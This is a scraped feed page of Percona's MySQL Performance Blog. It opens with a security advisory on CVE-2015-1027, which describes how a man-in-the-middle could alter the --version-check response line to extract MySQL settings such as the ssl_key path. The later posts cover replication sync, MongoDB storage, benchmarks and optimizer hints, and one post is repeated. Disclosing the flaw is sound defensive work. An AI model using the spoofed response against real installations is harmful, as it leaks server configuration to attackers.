]]>
]]>

You are here

Latest MySQL Performance Blog posts

Subscribe to Latest MySQL Performance Blog posts feed
Percona's MySQL & InnoDB performance and scalability blog
Updated: 26 min 11 sec ago

Percona Security Advisory CVE-2015-1027

May 6, 2015 - 7:52am
Contents
  1. Summary
  2. Analysis
  3. Mitigating factors
  4. P.O.C
  5. Acknowledgments
Summary

During a code audit performed internally at Percona, we discovered a
viable information disclosure attack when coupled with a MITM attack
in which percona-toolkit and xtrabackup perl components could be
coerced into returning additional MySQL configuration information.
The vulnerability has since been closed.

Timeline

2014-12-16 Initial research, proof of concept exploitation and report completion
2015-01-07 CVE reservation request to Mitre, LP 1408375
2015-01-10 CVE-2015-1027 assigned
2015-01-16 Initial fix code completion, testing against POC verified fix
2015-01-23 Internal notification of impending 2.2.13 release of Percona-toolkit
2015-01-26 2.2.13 percona toolkit released: blog post
2015-02-17 2.2.9 xtrabackup released: blog post
2015-05-06 Publication of this document

Analysis

The vulnerability exists in the –version-check functionality of the
perl scripts (LP 1408375), whilst the fix implemented for CVE-2014-2029
(LP 1279502) did patch the arbitrary command execution, MySQL
configuration information may still be exfiltrated by this method.

The normal HTTP/HTTPS conversation is as follows during a –version-check
call.

GET / HTTP/1.1
User-Agent: HTTP-Micro/0.01
Connection: close
Host: v.percona.com

HTTP/1.0 200 OK
Date: Mon, 15 Dec 2014 13:43:12 GMT
Server: Apache
Set-Cookie: PHPSESSID=bjtu6oic82g07rgr9b5906qrg1; path=/
cache-control: no-cache
Content-Length: 144
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug

OS;os_version
MySQL;mysql_variable;version_comment,version
Perl;perl_version
DBD::mysql;perl_module_version
Percona::Toolkit;perl_module_version

POST / HTTP/1.1
User-Agent: HTTP-Micro/0.01
Content-Type: application/octet-stream
Connection: close
X-Percona-Toolkit-Tool: pt-online-schema-change
Content-Length: 287
Host: v.percona.com

d6ca3fd0c3a3b462ff2b83436dda495e;DBD::mysql;4.021
1b6f35cca661d68ad4dfceeebfaf502e;MySQL;(Debian) 5.5.40-0+wheezy1
d6ca3fd0c3a3b462ff2b83436dda495e;OS;Debian GNU/Linux Kali Linux 1.0.9
d6ca3fd0c3a3b462ff2b83436dda495e;Percona::Toolkit;2.2.12
d6ca3fd0c3a3b462ff2b83436dda495e;Perl;5.14.2

HTTP/1.0 200 OK
Date: Mon, 15 Dec 2014 13:43:13 GMT
Server: Apache
Set-Cookie: PHPSESSID=nnm4bs99gef0rhepdnclpin233; path=/
cache-control: no-cache
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug

The issue centers around the interpretation of the response string

MySQL;mysql_variable;version_comment,version

This could be modified to extract additional information, for example the
ssl_key path.

MySQL;mysql_variable;version_comment,version,ssl_key

The program flow for –version-check is as follows
pingback -> parse_server_response -> get_versions -> sub_for_type.
The issue is the literal lookup of MySQL variables version_comment,
version, ssl_key (version 2.2.13 hard codes these to version_comment,version).

There also exists an issue with silent HTTP “downgrade” when SSL connection fails
in versions < 2.2.13.

7077 my $protocol = 'https'; # optimistic, but...
7078 eval { require IO::Socket::SSL; };
7079 if ( $EVAL_ERROR ) {
7080 PTDEBUG && _d($EVAL_ERROR);
7081 $protocol = 'http';
7082 }

Mitigating factors

This does require an existing presence in order to perform
the MITM attack, and spoof responses from v.percona.com.

This attack is limited to disclosing MySQL configuration information only, no data ex-filtration is known via this method at this time.

Debian && Ubuntu distribution packagers disabled this code in response to CVE-2014-2029

POCPython stand alone

Github GIST

MSF Module

Gihub GIST

Acknowledgements
  • Frank C – Percona (percona-toolkit dev)
  • Alexey K – Percona (percona-xtrabackup dev)
  • Peter S – Percona (Opensource director)
  • David B – Percona (ISA)
  • Andrea B – oCERT

The post Percona Security Advisory CVE-2015-1027 appeared first on MySQL Performance Blog.

Peter Zaitsev hits the road for East Coast MySQL Meetup tour

May 6, 2015 - 3:00am

Percona CEO Peter Zaitsev and Big Data guru Alexander Rubin will be speaking at Meetups along the East Coast next week with stops in Boston (May 11), New York City (May 12), Philadelphia (May 13) and Baltimore (May 14).

Dubbed the “MySQL Whistle-Stop Tour” since they’ll be traveling city to city via Amtrak, Peter will be speaking about last month’s Tokutek acquisition with audience Q&A, followed by a short presentation on “PXC – Next Generation HA for MySQL.”

Alexander will then discuss “advanced MySQL query tuning,” explaining how tuning MySQL queries and indexes can significantly increase the performance of your application and decrease response times.

And now for more detail around the talks….

Percona XtraDB Cluster (PXC) is a replacement for conventional MySQL master/slave architectures to eliminate replication lag and achieve a highly available masterless cluster of MySQL servers. In his talk Peter will discuss:

  • HA Solutions for MySQL
  • What PXC Has to Offer
  • Architecture Details
  • When to PXC and when not to PXC

And as I mentioned above, Peter will also talk about Tokutek, which has delivered Big Data processing power across two of the most important Open Source data management platforms: MySQL and MongoDB. The acquisition, which includes the Tokutek distribution of MongoDB, called TokuMX, positions Percona to offer design, service, support and remote management for both MySQL and a market-leading, ACID-compliant NoSQL database from one of the most trusted companies in the industry.

Alexander’s discussion on advanced MySQL query tuning will be focused on tuning the “usual suspects…” Queries with “Group By”, “Order By” and subqueries. These query types are usually under performing in MySQL and add an additional load because MySQL may need to create a temporary table(s) or perform a filesort. He’ll also share MySQL 5.6 features that can increase MySQL query performance for subqueries and “order by” queries.

We’ll also be raffling off one pass per meetup to the Percona Live Amsterdam (Sept. 21-22) conference, along with some cool Percona t-shirts. Tasty food and beverages will be complimentary… and you are also welcome to hang out and have a beer with Peter and Alexander after the meetup.

A huge thanks to our hosts, the meetup organizers!

Would your meetup group like to have a visit from Peter, Alexander and/or other Percona experts? Just let me know in the comments section below and I’ll be happy to see if we can make it happen. Percona is also happy to help with sponsorship of your meetups.

The post Peter Zaitsev hits the road for East Coast MySQL Meetup tour appeared first on MySQL Performance Blog.

MongoDB’s flexible schema: How to fix write amplification

May 5, 2015 - 8:56am

Being schemaless is one of the key features of MongoDB. On the bright side this allows developers to easily modify the schema of their collections without waiting for the database to be ready to accept a new schema. However schemaless is not free and one of the drawbacks is write amplification. Let’s focus on that topic.

Write amplification?

The link between schema and write amplification is not obvious at first sight. So let’s first look at a table in the relational world:

mysql> SELECT * FROM user LIMIT 2; +----+-------+------------+-----------+-----------+----------------------------------+---------+-----------------------------------+------------+------------+ | id | login | first_name | last_name | city | country | zipcode | address | password | birth_year | +----+-------+------------+-----------+-----------+----------------------------------+---------+-----------------------------------+------------+------------+ | 1 | arcu | Vernon | Chloe | Paulista | Cook Islands | 28529 | P.O. Box 369, 1464 Ac Rd. | SSC44GZL5R | 1970 | | 2 | quis | Rogan | Lewis | Nashville | Saint Vincent and The Grenadines | H3T 3S6 | P.O. Box 636, 5236 Elementum, Av. | TSY29YRN6R | 1983 | +----+-------+------------+-----------+-----------+----------------------------------+---------+-----------------------------------+------------+------------+

As all records have exactly the same fields, the field names are stored once in a separate file (.frm file). So the field names is metadata while the value of each field for each record is of course data.

Now let’s look at an equivalent collection in MongoDB:

{ { "login": "arcu", "first_name": "Vernon", "last_name": "Chloe", "city": "Paulista", "country": "Cook Islands", "zipcode": "28529", "address": "P.O. Box 369, 1464 Ac Rd.", "password": "SSC44GZL5R", "birth_year": 1970 }, { "login": "quis", "first_name": "Rogan", "last_name": "Lewis", "city": "Nashville", "country": "Saint Vincent and The Grenadines", "zipcode": "H3T 3S6", "address": "P.O. Box 636, 5236 Elementum, Av.", "password": "TSY29YRN6R", "birth_year": 1983 } }

One difference with a table in the relational world is that MongoDB doesn’t know which fields each document will have. Therefore field names are data, not metadata and they must be stored with each document.

Then the question is: how large is the overhead in terms of disk space? To have an idea, I inserted 10M such records in an InnoDB table (adding an index on password and on birth_year to make the table look like a real table): the size on disk is around 1.4GB.

I also inserted the exact same 10M records in a MongoDB collection using the regular MMAPv1 storage engine, again adding an index on password and on birth_year, and this time the size on disk is … 2.97GB!

Of course it is not an apples-to-apples comparison as the InnoDB storage format and the MongoDB storage format are not identical. However a 100% difference is still significant.

Compression

One way to deal with write amplification is to use compression. With MongoDB 3.0, the WiredTiger storage engine is available and one of its benefits is compression (default algorithm: snappy). Percona TokuMX also has built-in compression using zlib by default.

Rebuilding the collection with 10M documents and the 2 indexes now gives the following results:
WiredTiger: 1.14GB
TokuMX: 736MB

This is a 2.5x to 4x data size reduction, pretty good!

WiredTiger also provides zlib compression and in this case the collection is only 691MB. However CPU usage is much higher compared to snappy so zlib will not be usable in all situations.

Conclusion

MongoDB schemaless design is attractive but it comes with several tradeoffs. Write amplification is one of them and using either WiredTiger with MongoDB 3.0 or Percona TokuMX is a very simple way to fix the issue.

The post MongoDB’s flexible schema: How to fix write amplification appeared first on MySQL Performance Blog.

Keep your MySQL data in sync when using Tungsten Replicator

May 4, 2015 - 3:00am

MySQL replication isn’t perfect and sometimes our data gets out of sync, either by a failure in replication or human intervention. We are all familiar with Percona Toolkit’s pt-table-checksum and pt-table-sync to help us check and fix data inconsistencies – but imagine the following scenario where we mix regular replication with the Tungsten Replicator:

We have regular replication going from master (db1) to 4 slaves (db2, db3, db4 and db5), but also we find that db3 is also master of db4 and db5 using Tungsten replication for 1 database called test. This setup is currently working this way because it was deployed some time ago when multi-source replication was not possible using regular MySQL replication. This is now a working feature in MariaDB 10 and also a feature coming with the new MySQL 5.7 (not released yet)… in our case it is what it is

So how do we checksum and sync data when we have this scenario? Well we can still achieve it with these tools but we need to consider some extra actions:

pt-table-checksum  

First of all we need to understand that this tool was designed to checksum tables against a regular MySQL replication environment, so we need to take special care on how to avoid checksum errors by considering replication lag (yes Tungsten replication may still suffer replication lag). We also need to instruct the tool to discover slaves via dsn because the tool is designed to discover replicas using regular replication. This can be done by using the –plugin function.

My colleague Kenny already wrote an article about this some time ago but let’s revisit it to put some graphics around our case. In order to make pt-table-checksum work properly within Tungsten replicator environment we need to:
– Configure the –plugin flag using this plugin to check replication lag.
– Use –recursion-method=dsn to avoid auto-discover of slaves.

[root@db3]$ pt-table-checksum --replicate=percona.cksums  --create-replicate-table  --no-check-replication-filters  --no-check-binlog-format --recursion-method=dsn=h=db1,D=percona,t=dsns  --plugin=/home/mysql/bin/pt-plugin-tungsten_replicator.pl --check-interval=5  --max-lag=10  -d test Created plugin from /home/mysql/bin/pt-plugin-tungsten_replicator.pl. PLUGIN get_slave_lag: Using Tungsten Replicator to check replication lag Checksumming test.table1: 2% 18:14 remain Checksumming test.table1: 5% 16:25 remain Checksumming test.table1: 9% 15:06 remain Checksumming test.table1: 12% 14:25 remain Replica lag is 2823 seconds on db5 Waiting. Checksumming test.table1: 99% 14:25 remain TS ERRORS DIFFS ROWS CHUNKS SKIPPED TIME TABLE 04-28T14:17:19 0 13 279560873 4178 0 9604.892 test.table1

So far so good. We have implemented a good plugin that allows us to perform checksums considering replication lag, and we found differences that we need to take care of, let’s see how to do it.

pt-table-sync

pt-table-sync is the tool we need to fix data differences but in this case we 2 problems:
1- pt-table-sync doesn’t support –recursion-method=dsn, so we need to pass hostnames to be synced as parameter. A feature request to add this recursion method can be found here (hopefully it will be added soon). This means we will need to sync each slave separately.
2- Because of 1 we can’t use –replicate flags so pt-table-sync will need to re run checksums again to find and fix differences. If checksum found differences in more than 1 table I’d recommend running the sync in separate steps, pt-table-sync modifies data. We don’t want to blindly ask it to fix our servers, right?

That being said I’d recommend running pt-table-sync with –print flag first just to make sure the sync process is going to do what we want it to do, as follows:

[root@db3]$ pt-table-sync --print --verbose --databases test -t table1 --no-foreign-key-checks h=db3 h=db4 # Syncing h=db4 # DELETE REPLACE INSERT UPDATE ALGORITHM START END EXIT DATABASE.TABLE .... UPDATE `test`.`table1` SET `id`='2677', `status`='open', `created`='2015-04-27 02:22:33', `created_by`='8', `updated`='2015-04-27 02:22:33', WHERE `ix_id`='9585' LIMIT 1 /*percona-toolkit src_db:test src_tbl:table1 src_dsn:h=db3 dst_db:test dst_tbl:table1 dst_dsn:h=db4 lock:0 transaction:1 changing_src:0 replicate:0 bidirectional:0 pid:16135 user:mysql host:db3*/; UPDATE `test`.`table1` SET `id`='10528', `status`='open', `created`='2015-04-27 08:22:21', `created_by`='8', `updated`='2015-04-28 10:22:55', WHERE `ix_id`='9586' LIMIT 1 /*percona-toolkit src_db:test src_tbl:table1 src_dsn:h=db3 dst_db:test dst_tbl:table1 dst_dsn:h=db4 lock:0 transaction:1 changing_src:0 replicate:0 bidirectional:0 pid:16135 user:mysql host:db3*/; UPDATE `test`.`table1` SET `id`='8118', `status`='open', `created`='2015-04-27 18:22:20', `created_by`='8', `updated`='2015-04-28 10:22:55', WHERE `ix_id`='9587' LIMIT 1 /*percona-toolkit src_db:test src_tbl:table1 src_dsn:h=db3 dst_db:test dst_tbl:table1 dst_dsn:h=db4 lock:0 transaction:1 changing_src:0 replicate:0 bidirectional:0 pid:16135 user:mysql host:db3*/; UPDATE `test`.`table1` SET `id`='1279', `status`='open', `created`='2015-04-28 06:22:16', `created_by`='8', `updated`='2015-04-28 10:22:55', WHERE `ix_id`='9588' LIMIT 1 /*percona-toolkit src_db:test src_tbl:table1 src_dsn:h=db3 dst_db:test dst_tbl:table1 dst_dsn:h=db4 lock:0 transaction:1 changing_src:0 replicate:0 bidirectional:0 pid:16135 user:mysql host:db3*/; .... # 0 0 0 31195 Chunk 11:11:11 11:11:12 2 test.table1

Now that we are good to go, we will switch –print to –execute

[root@db3]$ pt-table-sync --execute --verbose --databases test -t table1 --no-foreign-key-checks h=db3 h=db4 # Syncing h=db4 # DELETE REPLACE INSERT UPDATE ALGORITHM START END EXIT DATABASE.TABLE # 0 0 0 31195 Nibble 13:26:19 14:48:54 2 test.table1

And voila: data is in sync now.

Conclusions

Tungsten Replicator is a useful tool to deploy these kind of scenarios, with no need to upgrade/change MySQL version – but it still has some tricks to avoid data inconsistencies. General recommendations on good replication practices still applies here, i.e. not allowing users to run write commands on slaves and so on.

Having this in mind we can still have issues with our data but now with an extra small effort we can keep things in good health without much pain.

The post Keep your MySQL data in sync when using Tungsten Replicator appeared first on MySQL Performance Blog.

LinkBenchX: benchmark based on arrival request rate

May 1, 2015 - 12:00am

An idea for a benchmark based on the “arrival request” rate that I wrote about in a post headlined “Introducing new type of benchmark” back in 2012 was implemented in Sysbench. However, Sysbench provides only a simple workload, so to be able to compare InnoDB with TokuDB, and later MongoDB with Percona TokuMX, I wanted to use more complicated scenarios. (Both TokuDB and TokuMX are part of Percona’s product line, in the case you missed Tokutek now part of the Percona family.)

Thanks to Facebook – they provide LinkBench, a benchmark that emulates the social graph database workload. I made modifications to LinkBench, which are available here: https://github.com/vadimtk/linkbenchX. The summary of modifications is

  • Instead of generating events in a loop, we generate events with requestrate and send the event for execution to one of available Requester thread.
  • At the start, we establish N (requesters) connections to database, which are idle by default, and just waiting for an incoming event to execute.
  • The main output of the benchmark is 99% response time for ADD_LINK (INSERT + UPDATE request) and GET_LINKS_LIST (range SELECT request) operations.
  • The related output is Concurrency, that is how many Requester threads are active during the time period.
  • Ability to report stats frequently (5-10 sec interval); so we can see a trend and a stability of the result.

Also, I provide a Java package, ready to execute, so you do not need to compile from source code. It is available on the release page at https://github.com/vadimtk/linkbenchX/releases

So the main focus of the benchmark is the response time and its stability over time.

For an example, let’s see how TokuDB performs under different request rates (this was a quick run to demonstrate the benchmark abilities, not to provide numbers for TokuDB).

First graph is the 99% response time (in milliseconds), measured each 10 sec, for arrival rate 5000, 10000 and 15000 operations/sec:

or, to smooth spikes, the same graph, but with Log 10 scale for axe Y:

So there are two observations: the response time increases with an increase in the arrival rate (as it supposed to be), and there are periodical spikes in the response time.

And now we can graph Concurrency (how many Threads are busy working on requests)…

…with an explainable observation that more threads are needed to handle bigger arrival rates, and also during spikes all available 200 threads (it is configurable) become busy.

I am looking to adopt LinkBenchX to run an identical workload against MongoDB.
The current schema is simple

CREATE TABLE `linktable` ( `id1` bigint(20) unsigned NOT NULL DEFAULT '0', `id2` bigint(20) unsigned NOT NULL DEFAULT '0', `link_type` bigint(20) unsigned NOT NULL DEFAULT '0', `visibility` tinyint(3) NOT NULL DEFAULT '0', `data` varchar(255) NOT NULL DEFAULT '', `time` bigint(20) unsigned NOT NULL DEFAULT '0', `version` int(11) unsigned NOT NULL DEFAULT '0', PRIMARY KEY (link_type, `id1`,`id2`), KEY `id1_type` (`id1`,`link_type`,`visibility`,`time`,`id2`,`version`,`data`) ) ENGINE=TokuDB DEFAULT CHARSET=latin1; CREATE TABLE `counttable` ( `id` bigint(20) unsigned NOT NULL DEFAULT '0', `link_type` bigint(20) unsigned NOT NULL DEFAULT '0', `count` int(10) unsigned NOT NULL DEFAULT '0', `time` bigint(20) unsigned NOT NULL DEFAULT '0', `version` bigint(20) unsigned NOT NULL DEFAULT '0', PRIMARY KEY (`id`,`link_type`) ) ENGINE=TokuDB DEFAULT CHARSET=latin1; CREATE TABLE `nodetable` ( `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `type` int(10) unsigned NOT NULL, `version` bigint(20) unsigned NOT NULL, `time` int(10) unsigned NOT NULL, `data` mediumtext NOT NULL, PRIMARY KEY(`id`) ) ENGINE=TokuDB DEFAULT CHARSET=latin1;

I am open for suggestions as to what is the proper design of documents for MongoDB – please leave your recommendations in the comments.

The post LinkBenchX: benchmark based on arrival request rate appeared first on MySQL Performance Blog.

Optimizer hints in MySQL 5.7.7 – The missed manual

April 30, 2015 - 12:00am

In version MySQL 5.7.7 Oracle presented a new promising feature: optimizer hints. However it did not publish any documentation about the hints. The only note which I found in the user manual about the hints is:

  • It is now possible to provide hints to the optimizer by including /*+ ... */ comments following the SELECT, INSERT, REPLACE, UPDATE, or DELETE keyword of SQL statements. Such statements can also be used with EXPLAIN. Examples:
    SELECT /*+ NO_RANGE_OPTIMIZATION(t3 PRIMARY, f2_idx) */ f1 FROM t3 WHERE f1 > 30 AND f1 < 33; SELECT /*+ BKA(t1, t2) */ * FROM t1 INNER JOIN t2 WHERE ...; SELECT /*+ NO_ICP(t1) */ * FROM t1 WHERE ...;

There are also three worklogs: WL #3996, WL #8016 and WL #8017. But they describe the general concept and do not have much information about which optimizations can be used and how. More light on this provided by slide 59 from Øystein Grøvlen’s session at Percona Live. But that’s all: no “official” full list of possible optimizations, no use cases… nothing.

I tried to sort it out myself.

My first finding is the fact that slide #59 really lists six of seven possible index hints. Confirmation for this exists in one of two new files under sql directory of MySQL source tree, created for this new feature.

$cat sql/opt_hints.h ... /** Hint types, MAX_HINT_ENUM should be always last. This enum should be synchronized with opt_hint_info array(see opt_hints.cc). */ enum opt_hints_enum { BKA_HINT_ENUM= 0, BNL_HINT_ENUM, ICP_HINT_ENUM, MRR_HINT_ENUM, NO_RANGE_HINT_ENUM, MAX_EXEC_TIME_HINT_ENUM, QB_NAME_HINT_ENUM, MAX_HINT_ENUM };

Looking into file sql/opt_hints.cc we can find out what these optimizations give not much choice: either enable or disable.

$cat sql/opt_hints.cc ... struct st_opt_hint_info opt_hint_info[]= { {"BKA", true, true}, {"BNL", true, true}, {"ICP", true, true}, {"MRR", true, true}, {"NO_RANGE_OPTIMIZATION", true, true}, {"MAX_EXECUTION_TIME", false, false}, {"QB_NAME", false, false}, {0, 0, 0} };

A choice for the way to include hints into SQL statements: inside comments with sign “+”/*+ NO_RANGE_OPTIMIZATION(t3 PRIMARY, f2_idx) */, – is compatible with style of optimizer hints which Oracle uses.

We actually had access to these hints before: they were accessible via variable optimizer_switch. At least such optimizations like BKA, BNL, ICP, MRR. But with new syntax we cannot only modify this access globally or per session, but can turn on or off particular optimization for a single table and column in the query. I can demonstrate it on this quite artificial but always accessible example:

mysql> use mysql Database changed mysql> explain select * from user where host in ('%', '127.0.0.1'); +----+-------------+-------+------------+-------+---------------+---------+---------+------+------+----------+-----------------------+ | id | select_type | table | partitions | type | possible_keys | key | key_len | ref | rows | filtered | Extra | +----+-------------+-------+------------+-------+---------------+---------+---------+------+------+----------+-----------------------+ | 1 | SIMPLE | user | NULL | range | PRIMARY | PRIMARY | 180 | NULL | 2 | 100.00 | Using index condition | +----+-------------+-------+------------+-------+---------------+---------+---------+------+------+----------+-----------------------+ 1 row in set, 1 warning (0.01 sec) mysql> explain select /*+ NO_RANGE_OPTIMIZATION(user PRIMARY) */ * from user where host in ('%', '127.0.0.1'); +----+-------------+-------+------------+------+---------------+------+---------+------+------+----------+-------------+ | id | select_type | table | partitions | type | possible_keys | key | key_len | ref | rows | filtered | Extra | +----+-------------+-------+------------+------+---------------+------+---------+------+------+----------+-------------+ | 1 | SIMPLE | user | NULL | ALL | PRIMARY | NULL | NULL | NULL | 5 | 40.00 | Using where | +----+-------------+-------+------------+------+---------------+------+---------+------+------+----------+-------------+ 1 row in set, 1 warning (0.00 sec)

I used one more hint, which we could not turn on or off directly earlier: range optimization.

One more “intuitively” documented feature is the ability to turn on or off a particular optimization. This works only for BKA, BNL, ICP and MRR: you can specify NO_BKA(table[[, table]…]), NO_BNL(table[[, table]…]), NO_ICP(table indexes[[, table indexes]…]) and NO_MRR(table indexes[[, table indexes]…]) to avoid using these algorithms for particular table or index in the JOIN.

MAX_EXECUTION_TIME does not require any table or key name inside. Instead you need to specify maximum time in milliseconds which query should run:

mysql> select /*+ MAX_EXECUTION_TIME(1000) */ sleep(1) from user; ERROR 3024 (HY000): Query execution was interrupted, max_statement_time exceeded mysql> select /*+ MAX_EXECUTION_TIME(10000) */ sleep(1) from user; +----------+ | sleep(1) | +----------+ | 0 | | 0 | | 0 | | 0 | | 0 | +----------+ 5 rows in set (5.00 sec)

QB_NAME is more complicated. WL #8017 tells us this is custom context. But what is this? The answer is in the MySQL test suite! Tests for optimizer hints exist in file t/opt_hints.test For QB_NAME very first entry is query:

EXPLAIN SELECT /*+ NO_ICP(t3@qb1 f3_idx) */ f2 FROM (SELECT /*+ QB_NAME(QB1) */ f2, f3, f1 FROM t3 WHERE f1 > 2 AND f3 = 'poiu') AS TD WHERE TD.f1 > 2 AND TD.f3 = 'poiu';

So we can specify custom QB_NAME for any subquery and specify optimizer hint only for this context.

To conclude this quick overview I want to show a practical example of when query hints are really needed. Last week I worked on an issue where a customer upgraded from MySQL version 5.5 to 5.6 and found some of their queries started to work slower than before. I wrote an answer which could sound funny, but still remains correct: “One of the reasons for such behavior is optimizer  improvements. While they all are made for better performance, some queries – optimized for older versions – can start working slower than before.”

To demonstrate a public example of such a query I will use my favorite source of information: MySQL Community Bugs Database. In a search for Optimizer regression bugs that are still not fixed we can find bug #68919 demonstrating regression in case the MRR algorithm is used for queries with LIMIT. In run queries, shown in the bug report, we will see a huge difference:

mysql> SELECT * FROM t1 WHERE i1>=42 AND i2<=42 LIMIT 1; +----+----+----+----+ | pk | i1 | i2 | i3 | +----+----+----+----+ | 42 | 42 | 42 | 42 | +----+----+----+----+ 1 row in set (6.88 sec) mysql> explain SELECT * FROM t1 WHERE i1>=42 AND i2<=42 LIMIT 1; +----+-------------+-------+------------+-------+---------------+------+---------+------+---------+----------+----------------------------------+ | id | select_type | table | partitions | type | possible_keys | key | key_len | ref | rows | filtered | Extra | +----+-------------+-------+------------+-------+---------------+------+---------+------+---------+----------+----------------------------------+ | 1 | SIMPLE | t1 | NULL | range | idx | idx | 4 | NULL | 9999958 | 33.33 | Using index condition; Using MRR | +----+-------------+-------+------------+-------+---------------+------+---------+------+---------+----------+----------------------------------+ 1 row in set, 1 warning (0.00 sec) mysql> SELECT /*+ NO_MRR(t1) */ * FROM t1 WHERE i1>=42 AND i2<=42 LIMIT 1; +----+----+----+----+ | pk | i1 | i2 | i3 | +----+----+----+----+ | 42 | 42 | 42 | 42 | +----+----+----+----+ 1 row in set (0.00 sec)

With MRR query execution takes 6.88 seconds and 0 if MRR is not used! But the bug report itself suggests usingoptimizer_switch="mrr=off";as a workaround. And this will work perfectly well if you are OK to runSET optimizer_switch="mrr=off";every time you are running a query which will take advantage of having it OFF. With optimizer hints you can have one or another algorithm to be ON for particular table in the query and OFF for another one. I, again, took quite an artificial example, but it demonstrates the method:

mysql> explain select /*+ MRR(dept_emp) */ * from dept_emp where to_date in (select /*+ NO_MRR(salaries)*/ to_date from salaries where salary >40000 and salary <45000) and emp_no >10100 and emp_no < 30200 and dept_no in ('d005', 'd006','d007'); +----+--------------+-------------+------------+--------+------------------------+------------+---------+----------------------------+---------+----------+-----------------------------------------------+ | id | select_type | table | partitions | type | possible_keys | key | key_len | ref | rows | filtered | Extra | +----+--------------+-------------+------------+--------+------------------------+------------+---------+----------------------------+---------+----------+-----------------------------------------------+ | 1 | SIMPLE | dept_emp | NULL | range | PRIMARY,emp_no,dept_no | dept_no | 8 | NULL | 10578 | 100.00 | Using index condition; Using where; Using MRR | | 1 | SIMPLE | <subquery2> | NULL | eq_ref | <auto_key> | <auto_key> | 3 | employees.dept_emp.to_date | 1 | 100.00 | NULL | | 2 | MATERIALIZED | salaries | NULL | ALL | salary | NULL | NULL | NULL | 2838533 | 17.88 | Using where | +----+--------------+-------------+------------+--------+------------------------+------------+---------+----------------------------+---------+----------+-----------------------------------------------+ 3 rows in set, 1 warning (0.00 sec)

 

The post Optimizer hints in MySQL 5.7.7 – The missed manual appeared first on MySQL Performance Blog.

Optimizer hints in MySQL 5.7.7 – The missed manual

April 30, 2015 - 12:00am

In version MySQL 5.7.7 Oracle presented a new promising feature: optimizer hints. However it did not publish any documentation about the hints. The only note which I found in the user manual about the hints is:

  • It is now possible to provide hints to the optimizer by including /*+ ... */ comments following the SELECT, INSERT, REPLACE, UPDATE, or DELETE keyword of SQL statements. Such statements can also be used with EXPLAIN. Examples:
    SELECT /*+ NO_RANGE_OPTIMIZATION(t3 PRIMARY, f2_idx) */ f1 FROM t3 WHERE f1 > 30 AND f1 < 33; SELECT /*+ BKA(t1, t2) */ * FROM t1 INNER JOIN t2 WHERE ...; SELECT /*+ NO_ICP(t1) */ * FROM t1 WHERE ...;

There are also three worklogs: WL #3996, WL #8016 and WL #8017. But they describe the general concept and do not have much information about which optimizations can be used and how. More light on this provided by slide 59 from Øystein Grøvlen’s session at Percona Live. But that’s all: no “official” full list of possible optimizations, no use cases… nothing.

I tried to sort it out myself.

My first finding is the fact that slide #59 really lists six of seven possible index hints. Confirmation for this exists in one of two new files under sql directory of MySQL source tree, created for this new feature.

$cat sql/opt_hints.h ... /** Hint types, MAX_HINT_ENUM should be always last. This enum should be synchronized with opt_hint_info array(see opt_hints.cc). */ enum opt_hints_enum { BKA_HINT_ENUM= 0, BNL_HINT_ENUM, ICP_HINT_ENUM, MRR_HINT_ENUM, NO_RANGE_HINT_ENUM, MAX_EXEC_TIME_HINT_ENUM, QB_NAME_HINT_ENUM, MAX_HINT_ENUM };

Looking into file sql/opt_hints.cc we can find out what these optimizations give not much choice: either enable or disable.

$cat sql/opt_hints.cc ... struct st_opt_hint_info opt_hint_info[]= { {"BKA", true, true}, {"BNL", true, true}, {"ICP", true, true}, {"MRR", true, true}, {"NO_RANGE_OPTIMIZATION", true, true}, {"MAX_EXECUTION_TIME", false, false}, {"QB_NAME", false, false}, {0, 0, 0} };

A choice for the way to include hints into SQL statements: inside comments with sign “+”/*+ NO_RANGE_OPTIMIZATION(t3 PRIMARY, f2_idx) */, – is compatible with style of optimizer hints which Oracle uses.

We actually had access to these hints before: they were accessible via variable optimizer_switch. At least such optimizations like BKA, BNL, ICP, MRR. But with new syntax we cannot only modify this access globally or per session, but can turn on or off particular optimization for a single table and column in the query. I can demonstrate it on this quite artificial but always accessible example:

mysql> use mysql Database changed mysql> explain select * from user where host in ('%', '127.0.0.1'); +----+-------------+-------+------------+-------+---------------+---------+---------+------+------+----------+-----------------------+ | id | select_type | table | partitions | type | possible_keys | key | key_len | ref | rows | filtered | Extra | +----+-------------+-------+------------+-------+---------------+---------+---------+------+------+----------+-----------------------+ | 1 | SIMPLE | user | NULL | range | PRIMARY | PRIMARY | 180 | NULL | 2 | 100.00 | Using index condition | +----+-------------+-------+------------+-------+---------------+---------+---------+------+------+----------+-----------------------+ 1 row in set, 1 warning (0.01 sec) mysql> explain select /*+ NO_RANGE_OPTIMIZATION(user PRIMARY) */ * from user where host in ('%', '127.0.0.1'); +----+-------------+-------+------------+------+---------------+------+---------+------+------+----------+-------------+ | id | select_type | table | partitions | type | possible_keys | key | key_len | ref | rows | filtered | Extra | +----+-------------+-------+------------+------+---------------+------+---------+------+------+----------+-------------+ | 1 | SIMPLE | user | NULL | ALL | PRIMARY | NULL | NULL | NULL | 5 | 40.00 | Using where | +----+-------------+-------+------------+------+---------------+------+---------+------+------+----------+-------------+ 1 row in set, 1 warning (0.00 sec)

I used one more hint, which we could not turn on or off directly earlier: range optimization.

One more “intuitively” documented feature is the ability to turn on or off a particular optimization. This works only for BKA, BNL, ICP and MRR: you can specify NO_BKA(table[[, table]…]), NO_BNL(table[[, table]…]), NO_ICP(table indexes[[, table indexes]…]) and NO_MRR(table indexes[[, table indexes]…]) to avoid using these algorithms for particular table or index in the JOIN.

MAX_EXECUTION_TIME does not require any table or key name inside. Instead you need to specify maximum time in milliseconds which query should run:

mysql> select /*+ MAX_EXECUTION_TIME(1000) */ sleep(1) from user; ERROR 3024 (HY000): Query execution was interrupted, max_statement_time exceeded mysql> select /*+ MAX_EXECUTION_TIME(10000) */ sleep(1) from user; +----------+ | sleep(1) | +----------+ | 0 | | 0 | | 0 | | 0 | | 0 | +----------+ 5 rows in set (5.00 sec)

QB_NAME is more complicated. WL #8017 tells us this is custom context. But what is this? The answer is in the MySQL test suite! Tests for optimizer hints exist in file t/opt_hints.test For QB_NAME very first entry is query:

EXPLAIN SELECT /*+ NO_ICP(t3@qb1 f3_idx) */ f2 FROM (SELECT /*+ QB_NAME(QB1) */ f2, f3, f1 FROM t3 WHERE f1 > 2 AND f3 = 'poiu') AS TD WHERE TD.f1 > 2 AND TD.f3 = 'poiu';

